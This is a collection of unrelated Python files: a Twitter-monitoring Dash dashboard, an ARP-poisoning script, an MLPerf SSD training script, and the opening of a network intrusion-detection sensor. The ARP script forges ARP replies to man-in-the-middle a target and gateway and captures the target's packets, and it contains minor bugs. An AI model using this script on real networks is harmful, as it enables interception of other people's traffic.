receives a counter rather than a dataframe
:param counter: Counter() instance
:param queue: Queue() instance
"""
queue.put(create_wc2(counter))
def update_counter(data_frame):
twiterator = map(process, data_frame['tweet'])
return init_counter(twiterator)
def update_tpm(data_frame, kws, tpm, datetime, return_changed=True):
"""
updates tweets-per-minute with new data_frame.
Params:
data_frame (pd.DataFrame): data of tweets.
tpm (dict(int[:])): dictionary with tweets-per-minute for different keywords.
kws (str[:]): list of keywords.
datetime (Datetime): last datetime in tpm.
Returns:
tpm_changed (bool): bool that says if tpm changed in the process or not.
tpm (dict(int[:])): new dictionary of tweets-per-minute.
new_datetime (Datetime): new datetime value.
"""
tpm_changed = False
new_tpm = get_tpm(data_frame, keywords)
for key in (kws + ['All']):
# keep only new values of tweets_per_minute
new_tpm[key] = new_tpm[key].loc[new_tpm[key].index > datetime]
tpm_changed = len(new_tpm[key].index) > 0
tpm[key] = tpm[key].append(new_tpm[key])
if len(tpm[key].index) > max_length: # check tpm array max length
tpm[key] = tpm[key].iloc[-max_length:]
new_datetime = tpm['All'].index.max()
if return_changed is True:
return tpm_changed, tpm, new_datetime
else:
return tpm, new_datetime
def update_tpm_users(data_frame, users, keywords, tpm, datetime, return_changed=True):
"""
updates tweets-per-minute with new data_frame for tweets that come from certain users.
Params:
data_frame (pd.DataFrame): data of tweets.
user (str[:]): list of usernames used to filter data_frame.
tpm (dict(int[:])): dictionary with tweets-per-minute for different keywords.
kws (str[:]): list of keywords.
datetime (Datetime): last datetime in tpm.
Returns:
tpm_changed (bool): bool that says if tpm changed in the process or not.
tpm (dict(int[:])): new dictionary of tweets-per-minute.
new_datetime (Datetime): new datetime value.
"""
tpm_changed = False
df_user = data_frame.loc[data_frame['screenName'].isin(users)]
new_tpm = get_tpm(df_user, keywords)
for key in (keywords + ['All']):
# keep only new values of tweets_per_minute
new_tpm[key] = new_tpm[key].loc[new_tpm[key].index > datetime]
tpm_changed = len(new_tpm[key].index) > 0
tpm[key] = tpm[key].append(new_tpm[key])
if len(tpm[key].index) > max_length: # check tpm array max length
tpm[key] = tpm[key].iloc[-max_length:]
new_datetime = tpm['All'].index.max()
if return_changed is True:
return tpm_changed, tpm, new_datetime
else:
return tpm, new_datetime
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# callbacks
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
@app.callback(
Output('signal', 'children'),
[Input('interval', 'n_intervals')]
)
def compute_data(_):
"""
function that will be triggerd after every "time_interval". It reads the data from mongo and returns it.
"""
return read_mongo('dbTweets', 'tweets_chile',
query_fields={"dateTweet": 1, "tweet": 1, "screenName": 1},
json_only=True, num_limit=10**5)
# tweets per minute callbacks
@app.callback(
[Output('plot-tweets-chile', 'figure'), Output('word-cloud-chile', 'figure')],
[Input('signal', 'children')]
)
def update_graphs_chile(data):
"""
When compute_data() returns the data read from mongo. The plot and wordcloud of "tab-chile" will be updated.
"""
global tpm_chile, datetime_chile, wc_chile, graph_chile
tpm_changed, tpm_chile, datetime_chile = \
update_tpm(json_pandas(data).copy(), keywords, tpm_chile, datetime_chile)
if tpm_changed is True:
#p = Process(target=multiprocessing_wc, args=(tpm_chile, keywords, q_chile))
#p.start()
graph_chile = create_graph(tpm_chile, keywords[:9])
#wc_chile = q_chile.get()
#p.join()
word_counter = update_counter(json_pandas(data).copy())
p2 = Process(target=multiprocessing_wc2, args=(word_counter, q_chile))
p2.start()
wc_chile = q_chile.get()
p2.join()
return graph_chile, wc_chile
@app.callback(
[Output('plot-tweets-prensa', 'figure'), Output('word-cloud-prensa', 'figure')],
[Input('signal', 'children')]
)
def update_graphs_prensa(data):
"""
When compute_data() returns the data read from mongo. The plot and wordcloud of "tab-prensa" will be updated.
"""
global tpm_prensa, datetime_prensa, wc_prensa, graph_prensa
tpm_changed, tpm_prensa, datetime_prensa = \
update_tpm_users(json_pandas(data).copy(), noticieros, keywords, tpm_prensa, datetime_prensa)
if tpm_changed is True:
p = Process(target=multiprocessing_wc, args=(tpm_prensa, keywords, q_prensa))
p.start()
graph_prensa = create_graph(tpm_prensa, keywords[:9])
wc_prensa = q_prensa.get()
p.join()
return graph_prensa, wc_prensa
@app.callback(
[Output('plot-tweets-politicos', 'figure'), Output('word-cloud-politicos', 'figure')],
[Input('signal', 'children')]
)
def update_graphs_politicos(data):
"""
When compute_data() returns the data read from mongo. The plot and wordcloud of "tab-politicos" will be updated.
"""
global tpm_politicos, datetime_politicos, wc_politicos, graph_politicos
tpm_changed, tpm_politicos, datetime_politicos = \
update_tpm_users(json_pandas(data).copy(), politicos, keywords, tpm_politicos, datetime_politicos)
if tpm_changed is True:
p = Process(target=multiprocessing_wc, args=(tpm_politicos, keywords, q_politicos))
p.start()
graph_politicos = create_graph(tpm_politicos, keywords[:9])
wc_politicos = q_politicos.get()
p.join()
return graph_politicos, wc_politicos
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# main
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
if __name__ == '__main__':
app.run_server(port=3000, debug=True)
|
arp_poison.py
|
'''
Made By Sai Harsha Kottapalli
Tested on python3
About : ARP poisoning
Use : convince target and gateway to pass traffic through this.
Note : need to notify localhost to forward packets (across gateway ip address and Target ip address)
Kali: $echo 1 > /proc/sys/net/ipv4/ip_forward
mac : $sudo sysctl -w net.inet.ip.forwarding=1
Check with $arp -a
'''
import os
import sys
import signal
import argparse
from threading import *
from scapy.all import *
def tgt_restore(gate_ip, gate_mac, tgt_ip, tgt_mac):
# send ARP packets with correct MAC address
send(ARP(op=2, psrc=gate_ip, pdst=tgt_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gate_mac), count=5)
send(ARP(op=2, psrc=tgt_ip, pdst=gate_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=tgt_mac), count=5)
#main thread exits
os.kill(os.get_pid(), signal.SIGINT)
def get_mac(ip):
#response after sending ARP request
responses, unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), timeout=2, retry=10)#send and receive
# return MAC address from response
for s, r in responses:
return r[Ether].src
return None
def tgt_poisoning(gate_ip, gate_mac, tgt_ip, tgt_mac):
tgt_poisoning = ARP()
tgt_poisoning.op = 2 # opcode 2 (reply)
tgt_poisoning.psrc = gate_ip
tgt_poisoning.pdst = tgt_ip
tgt_poisoning.hwdst = tgt_mac
gate_poison = ARP() #gateway poisoning
gate_poison.op = 2
gate_poison.psrc = tgt_ip
gate_poison.psdt = gate_ip
gate_poison.hwdst = tgt_mac
print("[*]ARP Poisoning starting....")
while True:
try:
send(tgt_poisoning)
send(gate_poison)
time.sleep(2)
except KeyboardInterrupt:
tgt_restore(gate_ip, gate_mac, tgt_ip, tgt_mac)
print("[*]ARP poisoning done.")
def main():
parser = argparse.ArgumentParser(description = "ARP poisoning")
parser.add_argument("-i",action="store",dest="interface",help="interface")
parser.add_argument("-ip",action="store",dest="ip",help="target ip address")
parser.add_argument("-g",action="store",dest="gateway",help="gateway ip address")
results = parser.parse_args()
interface = results.interface
tgt_ip = results.ip #target ip
gate_ip = results.gateway #gateway ip
if interface is None or tgt_ip is None or gate_ip is None:
parser.print_help()
exit(0)
count_packets = 1000 # sniff these many packets
print("[*]Setting {0} and {1}".format(interface,output))
conf.iface = interface # set up the interface
conf.verb = 0 # turn off output
gate_mac = get_mac(gate_ip) # gateway's MAC address
if gate_mac is not None:
print("[*] Gateway {0} is at {1}".format(gate_ip, gate_mac))
else:
print("[-]Could not get Gateway MAC address. Exit..")
sys.exit(0)
tgt_mac = get_mac(tgt_ip)
if tgt_mac is not None:
print("[*]Target's ip : {0} and MAC : {1}".format(tgt_ip, tgt_mac))
else:
print("[-]Could not get Target MAC address. Exit..")
#poisoning
t = Thread(target=tgt_poisoning, args=(gate_ip, gate_mac, tgt_ip, tgt_mac))
t.start()
try:
print("[*]Packets to be sniffed : {0}".format(count_packets))
bpf_filter = "ip host {0}".format(tgt_ip) # packets from the target IP
packets = sniff(count=count_packets, filter=bpf_filter, iface=interface)
# write packets
wrpcap("arper.pcap", packets)
# restore network
tgt_restore(gate_ip, gate_mac, tgt_ip, tgt_mac)
except KeyboardInterrupt:
# restore network
tgt_restore(gate_ip, gate_mac, tgt_ip, tgt_mac)
sys.exit(0)
if __name__ == "__main__":
main()
|
ssd_main_eval_fix.py
|
# Copyright 2018 Google. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training script for SSD.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import math
import multiprocessing
import sys
import threading
from absl import app
import tensorflow.compat.v1 as tf
from REDACTED.mlperf.submissions.training.v1_0.models.mlp_log import mlp_log
from REDACTED.mlperf.submissions.training.v1_0.models.ssd import coco_metric
from REDACTED.mlperf.submissions.training.v1_0.models.ssd import dataloader
from REDACTED.mlperf.submissions.training.v1_0.models.ssd import ssd_constants
from REDACTED.mlperf.submissions.training.v1_0.models.ssd import ssd_model
from REDACTED.mlperf.submissions.training.v1_0.models.util import train_and_eval_runner
# copybara:strip_begin
from REDACTED.REDACTED.multiprocessing import REDACTEDprocess
# copybara:strip_end
tf.flags.DEFINE_string(
'resnet_checkpoint',
'/REDACTED/mb-d/home/tpu-perf-team/ssd_checkpoint_mlperf',
'Location of the ResNet checkpoint to use for model '
'initialization.')
tf.flags.DEFINE_string('hparams', '',
'Comma separated k=v pairs of hyperparameters.')
tf.flags.DEFINE_integer(
'num_shards', default=8, help='Number of shards (TPU cores) for '
'training.')
tf.flags.DEFINE_integer('train_batch_size', 64, 'training batch size')
tf.flags.DEFINE_integer('eval_batch_size', 1, 'evaluation batch size')
tf.flags.DEFINE_integer('eval_samples', 5000, 'The number of samples for '
'evaluation.')
tf.flags.DEFINE_integer(
'iterations_per_loop', 1000, 'Number of iterations per TPU training loop')
tf.flags.DEFINE_string(
'training_file_pattern',
'REDACTEDtrain*',
'Glob for training data files (e.g., COCO train - minival set)')
tf.flags.DEFINE_string(
'validation_file_pattern',
'REDACTEDval*',
'Glob for evaluation tfrecords (e.g., COCO val2017 set)')
tf.flags.DEFINE_bool(
'use_fake_data', False,
'Use fake data to reduce the input preprocessing overhead (for unit tests)')
tf.flags.DEFINE_string(
'val_json_file',
'REDACTEDinstances_val2017.json',
'COCO validation JSON containing golden bounding boxes.')
tf.flags.DEFINE_integer('num_examples_per_epoch', 118287,
'Number of examples in one epoch')
tf.flags.DEFINE_integer('num_epochs', 64, 'Number of epochs for training')
tf.flags.DEFINE_multi_integer(
'input_partition_dims',
default=None,
help=('Number of partitions on each dimension of the input. Each TPU core'
' processes a partition of the input image in parallel using spatial'
' partitioning.'))
tf.flags.DEFINE_integer(
'dataset_threadpool_size', default=48,
help=('The size of the private datapool size in dataset.'))
tf.flags.DEFINE_bool('run_cocoeval', True, 'Whether to run cocoeval')
tf.flags.DEFINE_integer(
'bfloat16_replica_threshold',
default=128,
help=('Threshold for enabling bfloat16 for cross replica sum.'))
FLAGS = tf.flags.FLAGS
_STOP = -1
def construct_run_config(iterations_per_loop):
"""Construct the run config."""
# Parse hparams
hparams = ssd_model.default_hparams()
hparams.parse(FLAGS.hparams)
return dict(
hparams.values(),
num_shards=FLAGS.num_shards,
num_examples_per_epoch=FLAGS.num_examples_per_epoch,
resnet_checkpoint=FLAGS.resnet_checkpoint,
val_json_file=FLAGS.val_json_file,
model_dir=FLAGS.model_dir,
iterations_per_loop=iterations_per_loop,
steps_per_epoch=FLAGS.num_examples_per_epoch // FLAGS.train_batch_size,
eval_samples=FLAGS.eval_samples,
transpose_input=False if FLAGS.input_partition_dims is not None else True,
use_spatial_partitioning=True
if FLAGS.input_partition_dims is not None else False,
dataset_threadpool_size=FLAGS.dataset_threadpool_size
)
# copybara:strip_begin
def REDACTED_predict_post_processing():
"""REDACTED batch-processes the predictions."""
q_in, q_out = REDACTEDprocess.get_user_data()
predict_post_processing(q_in, q_out)
# copybara:strip_end
def predict_post_processing(q_in, q_out):
"""Run post-processing on CPU for predictions."""
coco_gt = coco_metric.create_coco(FLAGS.val_json_file, use_cpp_extension=True)
current_step, predictions = q_in.get()
while current_step != _STOP and q_out is not None:
q_out.put((current_step,
coco_metric.compute_map(
predictions,
coco_gt,
use_cpp_extension=True,
nms_on_tpu=True)))
current_step, predictions = q_in.get()
# converged_epoch marks the epoch convergence happens
# evals_completed is a large enough array whose entries are set
# to true when a eval finishes.
converged_epoch = 0
evals_completed = [False] * 50
def main(argv):
del argv # Unused.
global converged_epoch
converged_epoch = 0
params = construct_run_config(FLAGS.iterations_per_loop)
params['batch_size'] = FLAGS.train_batch_size // FLAGS.num_shards
params['bfloat16_replica_threshold'] = FLAGS.bfloat16_replica_threshold
params['first_lr_drop_epoch'] = ssd_constants.FIRST_LR_DROP_EPOCH * (
1 + params['drop_epoch_factor'] / 10)
params['second_lr_drop_epoch'] = ssd_constants.SECOND_LR_DROP_EPOCH * (
1 + params['drop_epoch_factor'] / 10)
input_partition_dims = FLAGS.input_partition_dims
train_steps = FLAGS.num_epochs * FLAGS.num_examples_per_epoch // FLAGS.train_batch_size
eval_steps = int(math.ceil(FLAGS.eval_samples / FLAGS.eval_batch_size))
runner = train_and_eval_runner.TrainAndEvalRunner(FLAGS.iterations_per_loop,
train_steps, eval_steps,
FLAGS.num_shards)
mlp_log.mlperf_print(key='cache_clear', value=True)
mlp_log.mlperf_print(key='init_start', value=None)
mlp_log.mlperf_print('global_batch_size', FLAGS.train_batch_size)
mlp_log.mlperf_print('opt_base_learning_rate', params['base_learning_rate'])
mlp_log.mlperf_print(
'opt_learning_rate_decay_boundary_epochs',
[params['first_lr_drop_epoch'], params['second_lr_drop_epoch']])
mlp_log.mlperf_print('opt_weight_decay', params['weight_decay'])
mlp_log.mlperf_print(
'model_bn_span', FLAGS.train_batch_size // FLAGS.num_shards *
params['distributed_group_size'])
batch_size = params['batch_size'] * params['num_shards']
lr_warmup_factor = 0
mlp_log.mlperf_print('opt_learning_rate_warmup_factor', lr_warmup_factor)
steps_per_epoch = params['num_examples_per_epoch'] / batch_size
params['lr_warmup_step'] = int(params['lr_warmup_epoch'] * steps_per_epoch)
mlp_log.mlperf_print(
'opt_learning_rate_warmup_steps', params['lr_warmup_step'])
mlp_log.mlperf_print('max_samples', ssd_constants.NUM_CROP_PASSES)
mlp_log.mlperf_print('train_samples', FLAGS.num_examples_per_epoch)
mlp_log.mlperf_print('eval_samples', FLAGS.eval_samples)
mlp_log.mlperf_print('gradient_accumulation_steps', 1)
train_input_fn = dataloader.SSDInputReader(
FLAGS.training_file_pattern,
params['transpose_input'],
is_training=True,
use_fake_data=FLAGS.use_fake_data,
params=params)
eval_input_fn = dataloader.SSDInputReader(
FLAGS.validation_file_pattern,
is_training=False,
use_fake_data=FLAGS.use_fake_data,
distributed_eval=True,
count=eval_steps * FLAGS.eval_batch_size,
params=params)
def init_fn():
tf.train.init_from_checkpoint(params['resnet_checkpoint'], {
'resnet%s/' % ssd_constants.RESNET_DEPTH:
'resnet%s/' % ssd_constants.RESNET_DEPTH,
})
runner.initialize(train_input_fn, eval_input_fn,
functools.partial(ssd_model.ssd_model_fn,
params), FLAGS.train_batch_size,
FLAGS.eval_batch_size, input_partition_dims, init_fn)
mlp_log.mlperf_print('init_stop', None)
mlp_log.mlperf_print('run_start', None)
if FLAGS.run_cocoeval:
# copybara:strip_begin
q_in, q_out = REDACTEDprocess.get_user_data()
processes = [
REDACTEDprocess.Process(target=REDACTED_predict_post_processing) for _ in range(4)
]
# copybara:strip_end_and_replace_begin
# q_in = multiprocessing.Queue(maxsize=ssd_constants.QUEUE_SIZE)
# q_out = multiprocessing.Queue(maxsize=ssd_constants.QUEUE_SIZE)
# processes = [
# multiprocessing.Process(
# target=predict_post_processing, args=(q_in, q_out))
# for _ in range(self.num_multiprocessing_workers)
# ]
# copybara:replace_end
for p in processes:
p.start()
def log_eval_results_fn():
"""Print out MLPerf log."""
global evals_completed
global converged_epoch
result = q_out.get()
success = False
while result[0] != _STOP:
if not success:
steps_per_epoch = (
FLAGS.num_examples_per_epoch // FLAGS.train_batch_size)
epoch = (result[0] + FLAGS.iterations_per_loop) // steps_per_epoch
mlp_log.mlperf_print(
'eval_accuracy',
result[1]['COCO/AP'],
metadata={'epoch_num': epoch})
mlp_log.mlperf_print('eval_stop', None, metadata={'epoch_num': epoch})
# Mark this eval as completed
evals_completed[(epoch // 5) - 1] = True
if result[1]['COCO/AP'] > ssd_constants.EVAL_TARGET:
# Moving this to after the check that all evals up to the
# converging one have finished.
# success = True
converged_epoch = epoch
# Once we have converged, we check that all the evals up to that
# epoch have completed.
if converged_epoch > 0:
for ep in range(5, converged_epoch + 1, 5):
if not evals_completed[(ep // 5) - 1]:
print('Converged but have not evaluated yet: ', ep)
break
if ep == converged_epoch:
print('Converged and evaluated all ', len(evals_completed))
success = True
mlp_log.mlperf_print(
'run_stop', None, metadata={'status': 'success'})
result = q_out.get()
if not success:
mlp_log.mlperf_print('run_stop', None, metadata={'status': 'abort'})
log_eval_result_thread = threading.Thread(target=log_eval_results_fn)
log_eval_result_thread.start()
def eval_init_fn(cur_step):
"""Executed before every eval."""
steps_per_epoch = FLAGS.num_examples_per_epoch // FLAGS.train_batch_size
epoch = cur_step // steps_per_epoch
mlp_log.mlperf_print(
'block_start',
None,
metadata={
'first_epoch_num': epoch,
'epoch_count': FLAGS.iterations_per_loop // steps_per_epoch
})
mlp_log.mlperf_print(
'eval_start',
None,
metadata={
'epoch_num': epoch + FLAGS.iterations_per_loop // steps_per_epoch
})
def eval_finish_fn(cur_step, eval_output, _):
steps_per_epoch = FLAGS.num_examples_per_epoch // FLAGS.train_batch_size
epoch = cur_step // steps_per_epoch
mlp_log.mlperf_print(
'block_stop',
None,
metadata={
'first_epoch_num': epoch,
'epoch_count': FLAGS.iterations_per_loop // steps_per_epoch
})
if FLAGS.run_cocoeval:
q_in.put((cur_step, eval_output['detections']))
runner.train_and_eval(eval_init_fn, eval_finish_fn)
if FLAGS.run_cocoeval:
for _ in processes:
q_in.put((_STOP, None))
for p in processes:
try:
p.join(timeout=10)
except Exception: # pylint: disable=broad-except
pass
q_out.put((_STOP, None))
log_eval_result_thread.join()
# Clear out all the queues to avoid deadlock.
while not q_out.empty():
q_out.get()
while not q_in.empty():
q_in.get()
if __name__ == '__main__':
# copybara:strip_begin
user_data = (multiprocessing.Queue(maxsize=ssd_constants.QUEUE_SIZE),
multiprocessing.Queue(maxsize=ssd_constants.QUEUE_SIZE))
in_compile_test = False
for arg in sys.argv:
if arg == '--xla_jf_exit_process_on_compilation_success=true':
in_compile_test = True
break
if in_compile_test:
# Exiting from XLA's C extension skips REDACTEDprocess's multiprocessing clean
# up. Don't use REDACTED process when xla is in compilation only mode.
tf.logging.set_verbosity(tf.logging.INFO)
app.run(main)
else:
with REDACTEDprocess.main_handler(user_data=user_data):
tf.logging.set_verbosity(tf.logging.INFO)
app.run(main)
# copybara:strip_end
# copybara:insert tf.logging.set_verbosity(tf.logging.INFO)
# copybara:insert app.run(main)
|
sensor.py
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2017 Miroslav Stampar (@stamparm)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function # Requires: Python >= 2.6
import sys
sys.dont_write_bytecode = True
import core.versioncheck
import inspect
import math
import mmap
import optparse
import os
import platform
import re
import socket
import subprocess
import struct
import threading
import time
import traceback
import urllib
import urlparse
from core.addr import inet_ntoa6
from core.attribdict import AttribDict
from core.common import check_connection
from core.common import check_sudo
from core.common import check_whitelisted
from core.common import load_trails
from core.enums import BLOCK_MARKER
from core.enums import PROTO
from core.enums import TRAIL
from core.log import create_log_directory
from core.log import get_error_log_handle
from core.log import log_error
from core.log import log_event
from core.parallel import worker
from core.parallel import write_block
from core.settings import check_memory
from core.settings import config
from core.settings import CAPTURE_TIMEOUT
from core.settings import CHECK_CONNECTION_MAX_RETRIES
from core.settings import CONFIG_FILE
from core.settings import CONSONANTS
from core.settings import DAILY_SECS
from core.settings import DLT_OFFSETS
from core.settings import DNS_EXHAUSTION_THRESHOLD
from core.settings import IGNORE_DNS_QUERY_SUFFIXES
from core.settings import IPPROTO_LUT
from core.settings import LOCALHOST_IP
from core.settings import MMAP_ZFILL_CHUNK_LENGTH
from core.settings import MAX_RESULT_CACHE_ENTRIES
from core.settings import NAME
from core.settings import NO_SUCH_NAME_COUNTERS
from core.settings import NO_SUCH_NAME_PER_HOUR_THRESHOLD
from core.settings import PORT_SCANNING_THRESHOLD
from core.settings import read_config
from core.settings import REGULAR_SENSOR_SLEEP_TIME
from core.settings import SNAP_LEN
from core.settings import SUSPICIOUS_CONTENT_TYPES
from core.settings import SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS
from core.settings import SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD
from core.settings import SUSPICIOUS_HTTP_PATH_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION
from core.settings import SUSPICIOUS_HTTP_REQUEST_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS
from core.settings import SUSPICIOUS_UA_REGEX
from core.settings import trails
from core.settings import VALID_DNS_CHARS
from core.settings import VERSION
from core.settings import WEB_SHELLS
from core.settings import WHITELIST
from core.settings import WHITELIST_DIRECT_DOWNLOAD_KEYWORDS
from core.settings import WHITELIST_LONG_DOMAIN_NAME_KEYWORDS
from core.settings import WHITELIST_HTTP_REQUEST_PATHS
from core.settings import WHITELIST_UA_KEYWORDS
from core.update import update_ipcat
from core.update import update_trails
_buffer = None
_caps = []
_connect_sec = 0
_connect_src_dst = {}
_connect_src_details = {}
_count = 0
_locks = AttribDict()
_multiprocessing = None
_n = None
_result_cache = {}
_last_syn = None
_last_logged_syn = None
_last_udp = None
_last_logged_udp = None
_last_dns_exhaustion = None
_quit = threading.Event()
_subdomains = {}
_subdomains_sec = None
_dns_exhausted_domains = set()
try:
import pcapy
except ImportError:
if subprocess.mswindows:
exit("[!] please install 'WinPcap' (e.g. 'http://www.winpcap.org/install/') and Pcapy (e.g. 'https://breakingcode.wordpress.com/?s=pcapy')")
else:
msg, _ = "[!] please install 'Pcapy'", platform.linux_distribution()[0].lower()
for distro, install in {("fedora", "centos"): "sudo yum install pcapy", ("debian", "ubuntu"): "sudo apt-get install python-pcapy"}.items():
if _ in distro:
msg += " (e.g. '%s')" % install
break
exit(msg)
def _check_domain_member(query, domains):
parts = query.lower().split('.')
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in domains:
return True
return False
def _check_domain_whitelisted(query):
return _check_domain_member(query, WHITELIST)
def _check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, proto, packet=None):
if _result_cache.get(query) == False:
return
result = False
if not _check_domain_whitelisted(query) and all(_ in VALID_DNS_CHARS for _ in query):
parts = query.lower().split('.')
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in trails:
if domain == query:
trail = domain
else:
_ = ".%s" % domain
trail = "(%s)%s" % (query[:-len(_)], _)
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[domain][0], trails[domain][1]), packet)
break
if not result and config.USE_HEURISTICS:
if len(parts[0]) > SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD and '-' not in parts[0]:
trail = None
if len(parts) > 2:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
elif len(parts) == 2:
trail = "(%s).%s" % (parts[0], parts[1])
else:
trail = query
if trail and not any(_ in trail for _ in WHITELIST_LONG_DOMAIN_NAME_KEYWORDS):
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, "long domain (suspicious)", "(heuristic)"), packet)
if result == False:
_result_cache[query] = False
def _process_packet(packet, sec, usec, ip_offset):
"""
Processes single (raw) IP layer data
"""
global _connect_sec
global _last_syn
global _last_logged_syn
global _last_udp
global _last_logged_udp
global _last_dns_exhaustion
global _subdomains_sec
try:
if len(_result_cache) > MAX_RESULT_CACHE_ENTRIES:
_result_cache.clear()
if config.USE_HEURISTICS:
if _locks.connect_sec:
_locks.connect_sec.acquire()
connect_sec = _connect_sec
_connect_sec = sec
if _locks.connect_sec:
_locks.connect_sec.release()
if sec > connect_sec:
for key in _connect_src_dst:
if len(_connect_src_dst[key]) > PORT_SCANNING_THRESHOLD:
_src_ip, _dst_ip = key.split('~')
if not check_whitelisted(_src_ip):
for _ in _connect_src_details[key]:
log_event((sec, usec, _src_ip, _[2], _dst_ip, _[3], PROTO.TCP, TRAIL.IP, _src_ip, "potential port scanning", "(heuristic)"), packet)
_connect_src_dst.clear()
_connect_src_details.clear()
ip_data = packet[ip_offset:]
ip_version = ord(ip_data[0]) >> 4
localhost_ip = LOCALHOST_IP[ip_version]
if ip_version == 0x04: # IPv4
ip_header = struct.unpack("!BBHHHBBH4s4s", ip_data[:20])
iph_length = (ip_header[0] & 0xf) << 2
protocol = ip_header[6]
src_ip = socket.inet_ntoa(ip_header[8])
dst_ip = socket.inet_ntoa(ip_header[9])
elif ip_version == 0x06: # IPv6
# Reference: http://chrisgrundemann.com/index.php/2012/introducing-ipv6-understanding-ipv6-addresses/
ip_header = struct.unpack("!BBHHBB16s16s", ip_data[:40])
iph_length = 40
protocol = ip_header[4]
src_ip = inet_ntoa6(ip_header[6])
dst_ip = inet_ntoa6(ip_header[7])
else:
return
if protocol == socket.IPPROTO_TCP: # TCP
src_port, dst_port, _, _, doff_reserved, flags = struct.unpack("!HHLLBB", ip_data[iph_length:iph_length+14])
if flags != 2 and config.plugin_functions:
if dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet, skip_write=True)
elif src_ip in trails and dst_ip != localhost_ip:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet, skip_write=True)
if flags == 2: # SYN set (only)
_ = _last_syn
_last_syn = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_syn: # skip bursts
return
if dst_ip in trails:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails and dst_ip != localhost_ip:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
if config.USE_HEURISTICS:
if dst_ip != localhost_ip:
key = "%s~%s" % (src_ip, dst_ip)
if key not in _connect_src_dst:
_connect_src_dst[key] = set()
_connect_src_details[key] = set()
_connect_src_dst[key].add(dst_port)
_connect_src_details[key].add((sec, usec, src_port, dst_port))
else:
tcph_length = doff_reserved >> 4
h_size = iph_length + (tcph_length << 2)
tcp_data = ip_data[h_size:]
if tcp_data.startswith("HTTP/"):
if any(_ in tcp_data[:tcp_data.find("\r\n\r\n")] for _ in ("X-Sinkhole:", "X-Malware-Sinkhole:", "Server: You got served", "Server: Apache 1.0/SinkSoft", "sinkdns.org")) or "\r\n\r\nsinkhole" in tcp_data:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, src_ip, "sinkhole response (malware)", "(heuristic)"), packet)
else:
index = tcp_data.find("<title>")
if index >= 0:
title = tcp_data[index + len("<title>"):tcp_data.find("</title>", index)]
if all(_ in title.lower() for _ in ("this domain", "has been seized")):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, title, "seized domain (suspicious)", "(heuristic)"), packet)
content_type = None
first_index = tcp_data.find("\r\nContent-Type:")
if first_index >= 0:
first_index = first_index + len("\r\nContent-Type:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
content_type = tcp_data[first_index:last_index].strip().lower()
if content_type and content_type in SUSPICIOUS_CONTENT_TYPES:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, content_type, "content type (suspicious)", "(heuristic)"), packet)
method, path = None, None
index = tcp_data.find("\r\n")
if index >= 0:
line = tcp_data[:index]
if line.count(' ') == 2 and " HTTP/" in line:
method, path, _ = line.split(' ')
if method and path:
post_data = None
host = dst_ip
first_index = tcp_data.find("\r\nHost:")
if first_index >= 0:
first_index = first_index + len("\r\nHost:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
host = tcp_data[first_index:last_index]
host = host.strip().lower()
if host.endswith(":80"):
host = host[:-3]
if host and host[0].isalpha() and dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, "%s (%s)" % (dst_ip, host.split(':')[0]), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif config.CHECK_HOST_DOMAINS and not host.replace('.', "").isdigit():
